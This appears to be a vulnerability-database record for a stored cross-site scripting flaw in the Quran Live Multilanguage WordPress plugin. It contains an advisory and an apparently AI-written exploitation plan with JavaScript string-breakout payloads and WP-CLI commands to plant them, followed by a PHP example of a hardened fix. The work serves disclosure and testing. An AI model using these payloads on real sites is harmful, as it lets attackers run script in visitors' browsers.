[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fzI9jMGhiBz_cP3HhmbDyVKouXjrUijrw9H5ayU5D8H4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-4074","quran-live-multilanguage-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Quran Live Multilanguage \u003C= 1.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Quran Live Multilanguage plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cheikh' and 'lang' shortcode attributes in all versions up to, and including, 1.0.3. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. The quran_live_render() function of quran-live.php receives shortcode attributes and passes them directly through shortcode_atts() and extract() without any sanitization. These values are then passed to Render_Quran_Live::render_verse_quran_live() where they are echoed directly into inline \u003Cscript> blocks using PHP short tags (\u003C?=$cheikh;?> and \u003C?=$lang;?>) at lines 191, 216, 217, 245, and 246 of Class_QuranLive.php. 
Since the output occurs inside a JavaScript context within \u003Cscript> tags, an attacker can break out of the JavaScript string and inject arbitrary script code. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","quran-live",null,"\u003C=1.0.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 19:06:14","2026-04-22 07:45:39",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F883484dd-d48d-46f9-ae96-223626c50039?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2026-4074 - Quran Live Multilanguage Stored XSS\n\n## 1. Vulnerability Summary\nThe **Quran Live Multilanguage** plugin (\u003C= 1.0.3) is vulnerable to Stored Cross-Site Scripting (XSS) via the `cheikh` and `lang` attributes of its shortcode. The `quran_live_render()` function in `quran-live.php` fails to sanitize these attributes after extracting them via `shortcode_atts()`. These unsanitized values are subsequently passed to `Render_Quran_Live::render_verse_quran_live()` in `Class_QuranLive.php`, where they are echoed directly into inline `\u003Cscript>` blocks using PHP short tags (`\u003C?=$cheikh;?>` and `\u003C?=$lang;?>`). Because the values are placed inside a JavaScript context without escaping, an authenticated attacker with Contributor-level permissions (who can create posts containing shortcodes) can inject arbitrary JavaScript that executes in the browser of anyone viewing the post.\n\n## 2. 
Attack Vector Analysis\n- **Authentication Level:** Contributor or higher (any role capable of creating\u002Fediting posts and using shortcodes).\n- **Vulnerable Component:** Shortcode rendering logic.\n- **Vulnerable Attributes:** `cheikh` and `lang`.\n- **Payload Placement:** The malicious payload is placed within the attributes of the `[quran-live]` shortcode (exact shortcode name to be verified, inferred as `quran-live`).\n- **Execution Context:** Inline `\u003Cscript>` tags within the HTML frontend.\n\n## 3. Code Flow\n1. **Entry Point:** A user with Contributor permissions saves a post containing a shortcode: `[quran-live cheikh=\"\u003CPAYLOAD>\" lang=\"\u003CPAYLOAD>\"]`.\n2. **Registration:** The plugin registers a shortcode handler (likely `quran_live_render`) via `add_shortcode('quran-live', 'quran_live_render')`.\n3. **Processing:** When the post is viewed, WordPress calls `quran_live_render($atts)`.\n4. **Unsafe Extraction:** `quran_live_render()` calls `shortcode_atts()` and then `extract($atts)`, creating local variables `$cheikh` and `$lang` containing the raw payload.\n5. **Vulnerable Sink:** These variables are passed to `Render_Quran_Live::render_verse_quran_live($cheikh, $lang, ...)`.\n6. **Output:** Inside `Class_QuranLive.php` (lines 191, 216, 217, 245, 246), the code uses PHP short tags to echo these variables inside JavaScript blocks:\n   ```javascript\n   var some_js_variable = '\u003C?=$cheikh;?>';\n   ```\n7. **Execution:** The browser interprets the injected JS breakout (e.g., `';alert(1)\u002F\u002F`).\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not require a specific plugin-defined nonce for exploitation because the \"storage\" phase uses the standard WordPress post creation\u002Fediting flow. \n\n1. **Post Creation:** Contributors use the standard `wp-admin\u002Fpost-new.php` or the REST API to save posts. 
This is protected by standard WordPress nonces, which the browser\u002Fagent session handles automatically when creating a post.\n2. **Rendering:** No nonce is required to view a published post or a preview of a post.\n\n## 5. Exploitation Strategy\n\n### Step 1: Create a Contributor User\nUse WP-CLI to create a user with the contributor role.\n```bash\nwp user create attacker attacker@example.com --role=contributor --user_pass=password123\n```\n\n### Step 2: Create a Malicious Post\nThe contributor creates a post containing the malicious shortcode. We target the JavaScript string context rather than injecting a `\u003Cscript>` tag of our own, because a Contributor lacks the `unfiltered_html` capability and KSES strips tags from the saved post content; the breakout payloads below contain no `\u003C` or `>`, so KSES leaves them intact.\n\n**Payloads:**\n- For `cheikh`: `';alert(document.domain);var x='`\n- For `lang`: `';alert('XSS_LANG');var y='`\n\nEither breakout form works: the `var x='` variant re-opens a string to swallow the plugin's own closing quote, while the `\u002F\u002F` variant used in the command below comments it out instead. The payload must not contain a literal `\"`: WordPress parses a double-quoted shortcode attribute as `\"([^\"]*)\"`, so a `\"` inside the value ends the attribute early and the handler never receives the rest.\n\n**Exploit Request (via `http_request` or `browser_navigate`):**\nThe agent will log in as the contributor and create a post. However, for a PoC, `wp post create` is more efficient to establish the \"Stored\" state (a Contributor cannot publish through the UI; their post would sit in Pending and the payload would fire when an Editor or Administrator previews it, which `--post_status=publish` short-circuits here).\n\n```bash\nwp post create --post_type=post --post_status=publish --post_title=\"Quran Live Test\" --post_author=$(wp user get attacker --field=ID) --post_content=\"[quran-live cheikh=\\\"';alert(document.domain)\u002F\u002F\\\" lang=\\\"';alert(1)\u002F\u002F\\\"]\"\n```\n*(Note: Escaping quotes in the CLI command is critical; the whole argument is wrapped in double quotes so the single quotes of the payload pass through literally, and the goal is to get `[quran-live cheikh=\"';alert(document.domain)\u002F\u002F\" lang=\"';alert(1)\u002F\u002F\"]` into the database).*\n\n### Step 3: Trigger the XSS\nNavigate to the newly created post as an administrator or anonymous user to trigger the execution. The permalink can be taken from WP-CLI (`wp post url \u003CID>`) or read from the page:\n\n```javascript\n\u002F\u002F Example browser_navigate target\nconst postUrl = await page.evaluate(() => {\n    return document.querySelector('a[rel=\"bookmark\"]').href; \u002F\u002F or use wp-cli to get the permalink\n});\n```\n\n## 6. Test Data Setup\n1. **Plugin Activation:** Ensure `quran-live` is installed and activated.\n2. **Post Content:** Use the shortcode `[quran-live]`.\n3. 
**Shortcode Name Verification:** If `quran-live` is not the shortcode, grep the source: `grep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fquran-live\u002F`.\n\n## 7. Expected Results\nWhen the page is rendered, the HTML emitted by `Class_QuranLive.php:191` (and the other listed lines) should look like this, assuming the sink is a single-quoted JavaScript string literal (confirmed by the grep in section 9; `someVar` stands for whatever variable the plugin assigns):\n```html\n\u003Cscript>\n    \u002F\u002F ... internal plugin JS ...\n    var someVar = '';alert(document.domain)\u002F\u002F';\n\u003C\u002Fscript>\n```\nThe leading `'` of the payload closes the empty string literal, `alert(document.domain)` runs as its own statement, and the trailing `\u002F\u002F` comments out the plugin's closing quote and the rest of that line, so the script stays syntactically valid and executes.\n\n## 8. Verification Steps\n1. **Database Check:** Verify the shortcode is stored correctly in `wp_posts` (the single quotes of the payload must be present verbatim).\n   ```bash\n   wp db query \"SELECT post_content FROM wp_posts WHERE post_title='Quran Live Test'\"\n   ```\n2. **Frontend Inspection:** Use `http_request` to fetch the rendered post and check for the breakout pattern inside the plugin's inline script block.\n   ```bash\n   # Look for the breakout pattern in the response\n   grep -C 5 \"alert(document.domain)\" response_body.html\n   ```\n3. **Execution Check:** Use `browser_navigate` and check for an alert dialog or a specific side effect (like a `console.log` or a global variable being set).\n\n## 9. 
Alternative Approaches\nIf the plugin attributes are not inside quotes (unlikely for JS variables), the payload would be simpler:\n- **Payload (No quotes):** `alert(1)`\n- **Payload (Inside function call):** `1);alert(1);(`\n\nIf the shortcode requires specific setup to render (like a specific post meta), we may need to use `wp post generate` or `wp post meta set` to satisfy `quran_live_render`'s logic.\n\n**Grep search for exact JS context** (single quotes around the pattern, so the shell does not expand `$cheikh` to an empty string):\n```bash\ngrep -n '\u003C?=$cheikh;?>' \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fquran-live\u002FClass_QuranLive.php\n```\nThis will confirm whether we need to break out of single quotes `'`, double quotes `\"`, or a template literal `` ` ``.","gemini-3-flash-preview","2026-04-27 14:01:20","2026-04-27 14:01:42",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquran-live\u002Ftags"]
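The unsafe flow the advisory describes (shortcode attributes pulled in with `shortcode_atts()` and `extract()`, then echoed raw into a `<script>` block) beside a hardened handler, as an added example that is not the Quran Live Multilanguage plugin's code and not part of the record above. It assumes a `[quran-live]` shortcode with `cheikh` and `lang` attributes and hypothetical allow-lists of valid values (`$allowedCheikh`, `$allowedLang`); the WordPress functions `shortcode_atts()`, `sanitize_key()` and `wp_json_encode()` are shimmed with minimal equivalents behind `function_exists()` so the file runs under a plain `php` CLI, and the sample attribute values are constructed.

```php
<?php
// Added example: not the plugin's code. Models the shortcode-to-<script> flow
// described in the advisory next to a hardened version. The three shims stand
// in for the real WordPress functions so this file runs under a plain `php`
// CLI; inside WordPress they are skipped because the real ones already exist.

if (!function_exists('shortcode_atts')) {
    // Shim (assumption): like WordPress, keep only keys that have a default.
    function shortcode_atts(array $pairs, $atts): array {
        $atts = (array) $atts;
        $out  = [];
        foreach ($pairs as $name => $default) {
            $out[$name] = array_key_exists($name, $atts) ? $atts[$name] : $default;
        }
        return $out;
    }
}
if (!function_exists('sanitize_key')) {
    // Shim (assumption): lowercase and strip everything except [a-z0-9_-].
    function sanitize_key($key): string {
        return preg_replace('/[^a-z0-9_\-]/', '', strtolower((string) $key));
    }
}
if (!function_exists('wp_json_encode')) {
    function wp_json_encode($data, int $flags = 0): string {
        return json_encode($data, $flags);
    }
}

// Vulnerable pattern: attribute values land in local variables via extract()
// and are interpolated into single-quoted JavaScript string literals, the
// equivalent of the plugin's <?=$cheikh;?> / <?=$lang;?> short tags.
function render_verse_unsafe($atts): string {
    extract(shortcode_atts(['cheikh' => 'default', 'lang' => 'en'], $atts));
    return "<script>\n"
         . "    var cheikh = '{$cheikh}';\n"
         . "    var lang   = '{$lang}';\n"
         . "</script>";
}

// Hardened pattern: reduce each attribute to a key-shaped token, accept it only
// if it is on the allow-list (falling back to the first entry), and let
// wp_json_encode() emit the JavaScript literal. The JSON_HEX_* flags encode
// < > & ' " as \uXXXX, so neither a quote nor a </script> sequence can
// change the meaning of the surrounding script.
function render_verse_safe($atts, array $allowedCheikh, array $allowedLang): string {
    $a      = shortcode_atts(['cheikh' => $allowedCheikh[0], 'lang' => $allowedLang[0]], $atts);
    $cheikh = sanitize_key($a['cheikh']);
    $lang   = sanitize_key($a['lang']);
    if (!in_array($cheikh, $allowedCheikh, true)) {
        $cheikh = $allowedCheikh[0];
    }
    if (!in_array($lang, $allowedLang, true)) {
        $lang = $allowedLang[0];
    }
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return "<script>\n"
         . "    var cheikh = " . wp_json_encode($cheikh, $flags) . ";\n"
         . "    var lang   = " . wp_json_encode($lang, $flags) . ";\n"
         . "</script>";
}

// Constructed sample input: what WordPress hands the handler after parsing
// [quran-live cheikh="';alert(document.domain)//" lang="en"] from a post.
$atts = ['cheikh' => "';alert(document.domain)//", 'lang' => 'en'];

// Hypothetical allow-lists; a real plugin would derive them from its own
// reciter and language tables.
$allowedCheikh = ['default', 'reciter_a', 'reciter_b'];
$allowedLang   = ['en', 'ar', 'fr'];

echo "--- unsafe: the literal is closed, alert() runs, // hides the rest of the line ---\n";
echo render_verse_unsafe($atts), "\n\n";
echo "--- hardened: unknown value replaced by the default, emitted as a JSON literal ---\n";
echo render_verse_safe($atts, $allowedCheikh, $allowedLang), "\n";
```

Running it prints `var cheikh = '';alert(document.domain)//';` for the unsafe handler, which is exactly the breakout the research plan expects, and `var cheikh = "default";` for the hardened one. If the template must keep its own quotes, `esc_js()` inside the literal (`'<?= esc_js($cheikh) ?>'`) is the WordPress escape for that position, but allow-listing the value first and emitting it with `wp_json_encode()` removes the dependence on matching the escape to the exact quoting context, which is the point the section 9 grep is trying to pin down.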